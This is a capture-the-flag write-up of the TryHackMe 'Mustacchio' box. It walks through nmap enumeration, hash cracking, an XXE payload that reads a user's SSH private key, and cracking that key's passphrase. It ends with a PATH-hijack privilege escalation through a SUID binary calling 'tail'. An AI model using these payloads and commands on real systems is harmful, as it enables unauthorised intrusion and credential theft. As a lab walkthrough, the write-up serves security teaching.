TryHackMe: Mustacchio Writeup
Mustacchio is an easy level box available on Try Hack Me. It includes password cracking, XXE and exploiting SUID binaries. This box is created by zyeinn.
Challenge Link: https://tryhackme.com/room/mustacchio
Enumeration
I started the enumeration with nmap scan to look for open ports and running services. You can also use rustscan for faster results using the command shown below.
❯ nmap -sC -sV -Pn -p- -T4 --max-rate=1000 10.10.192.38 -oN nmap.txt
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-12 13:10 IST
Stats: 0:02:42 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 60.95% done; ETC: 13:15 (0:01:44 remaining)
Nmap scan report for 10.10.192.38
Host is up (0.19s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d3:9e:50:66:5f:27:a0:60:a7:e8:8b:cb:a9:2a:f0:19 (RSA)
| 256 5f:98:f4:5d:dc:a1:ee:01:3e:91:65:0a:80:52:de:ef (ECDSA)
|_ 256 5e:17:6e:cd:44:35:a8:0b:46:18:cb:00:8d:49:b3:f6 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Mustacchio | Home
8765/tcp open http nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Mustacchio | Login
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
As you can see multiple ports are open, and different services are running on each port. First let's enumerate the apache server on port 80.
While going through the website I found two hashes in /custom/js/mobile.js and the second hash in /custom/js/users.bak.
Next, I cracked these hashes using hashcat and found that both the hash are of text "bull*****".
Directory brute forcing doesn't reveal any important webpage, so I started to enumerate the nginx server on port 8765 and found a login page.
I was able to login using creds, admin:bull***** and after logging in, I found a comment functionality.
Exploitation
Adding "hello" text doesn't reflect anything. I thought it could be XSS but the normal XSS payload also didn't work. After checking the source code of home.php, I found something interesting.
The source code clearly shows that this can be a XXE vulnerability. Also in the source code I found the comment Barry, you can now SSH in using your key! and this confirms that using XXE we have to read barry's SSH key. Also I found an interesting file in the source code dontforget.bak.
This is XML, so using the same format I tried to add the comment.
<comment>
<name>Joe Hamd</name>
<author>Barry Clad</author>
<com>hello.</com>
</comment>This time it worked successfully. Now it's time to exploit the XXE so that we can read internal files like barry's SSH key by using the following payload:
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///home/barry/.ssh/id_rsa" >]>
<comment>
<name>Joe Hamd</name>
<author>Barry Clad</author>
<com>&xxe;</com>
</comment>
Now we have the id_rsa that can be used to SSH into the machine as user barry, but before that we need to crack the passphrase using ssh2john.
❯ python /usr/share/john/ssh2john.py id_rsa > hash
❯ ../../jumbo/run/john --wordlist=../../rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
uri***** (id_rsa)
1g 0:00:00:02 DONE (2021-06-12 14:17) 0.4048g/s 1202Kp/s 1202Kc/s 1202KC/s urieljr.k..urielfabricio07
Use the "--show" option to display all of the cracked passwords reliably
Session completed.Now using this passphrase and id_rsa we can SSH into the machine.
ssh barry@10.10.255.10 -i id_rsa
The authenticity of host '10.10.255.10 (10.10.255.10)' can't be established.
ECDSA key fingerprint is SHA256:g//RSEsVCZF6FIydF0R24Gmek8fI6D7kRnDXF3fNK9Y.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.255.10' (ECDSA) to the list of known hosts.
Enter passphrase for key 'id_rsa':
.
.
.
barry@mustacchio:~$ id
uid=1003(barry) gid=1003(barry) groups=1003(barry),4(adm)
Privilege Escalation
I started to find SUID binaries using the command shown below.
barry@mustacchio:~$ find / -perm -u=s -type f 2>/dev/null
.
.
.
/usr/bin/sudo
/usr/bin/newuidmap
/usr/bin/gpasswd
/home/joe/live_log/home/joe/live_log binary looks interesting. After running strings command on this binary, I found that it is using tail command to read the nginx logs.
barry@mustacchio:~$ strings /home/joe/live_log
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
printf
system
__cxa_finalize
setgid
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u+UH
[]A\A]A^A_
Live Nginx Log Reader
tail -f /var/log/nginx/access.logNow if we observe carefully, tail is not called from it's actual path, we can take advantage of this by adding our own path in $PATH environment variable and creating a new file with name tail.
barry@mustacchio:/tmp$ nano tail
barry@mustacchio:/tmp$ cat tail
#!/bin/sh
bash
barry@mustacchio:/tmp$ chmod 777 tail
barry@mustacchio:/tmp$ export PATH=/tmp:$PATH
barry@mustacchio:/tmp$ /home/joe/live_log
root@mustacchio:/tmp# id
uid=0(root) gid=0(root) groups=0(root),4(adm),1003(barry)
We are root now and we have completed the challenge successfully!
Skills Learned
- Password cracking
- Finding and exploiting XXE
- Cracking
id_rsapassphrase - SUID binary exploitation
Thanks for reading! For any queries you can DM me on discord golith3r00t#1859.
NOTE: The awesome artwork used in this article was created by Nicholas Roberts.